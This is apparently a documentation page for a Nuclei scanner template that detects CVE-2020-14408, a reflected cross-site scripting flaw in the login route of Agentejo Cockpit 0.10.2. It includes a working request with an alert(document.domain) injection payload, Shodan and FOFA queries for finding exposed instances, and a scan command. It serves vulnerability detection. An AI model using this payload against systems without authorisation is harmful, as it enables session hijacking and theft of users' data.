Agentejo Cockpit 0.10.2 - Cross-Site Scripting
ID: CVE-2020-14408
Severity: medium
Author: edoardottt
Tags: cve2020,cve,cockpit,agentejo,xss,oss
Description
Section titled “Description”Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page’s content.
YAML Source
Section titled “YAML Source”id: CVE-2020-14408
info: name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting author: edoardottt severity: medium description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Agentejo Cockpit or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/agentejo/cockpit/issues/1310 - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/StarCrossPortal/scalpel - https://github.com/anonymous364872/Rapier_Tool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-14408 cwe-id: CWE-79 epss-score: 0.00113 epss-percentile: 0.44743 cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: agentejo product: cockpit shodan-query: - http.favicon.hash:688609340 - http.html:"cockpit" fofa-query: - icon_hash=688609340 - body="cockpit" tags: cve2020,cve,cockpit,agentejo,xss,oss
http: - method: GET path: - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"
matchers-condition: and matchers: - type: word part: body words: - "redirectTo = '/92874';alert(document.domain)//280';"
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 490a00463044022061c0adfb3676c774e441561d7a036a76f4c6ee29b9b3a0de5028ac7c40078d6c02207ac47ff055218487f0b6a43a3b76825d2f08ab5abed9d6a2b5404b0be78a2325:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-14408.yaml"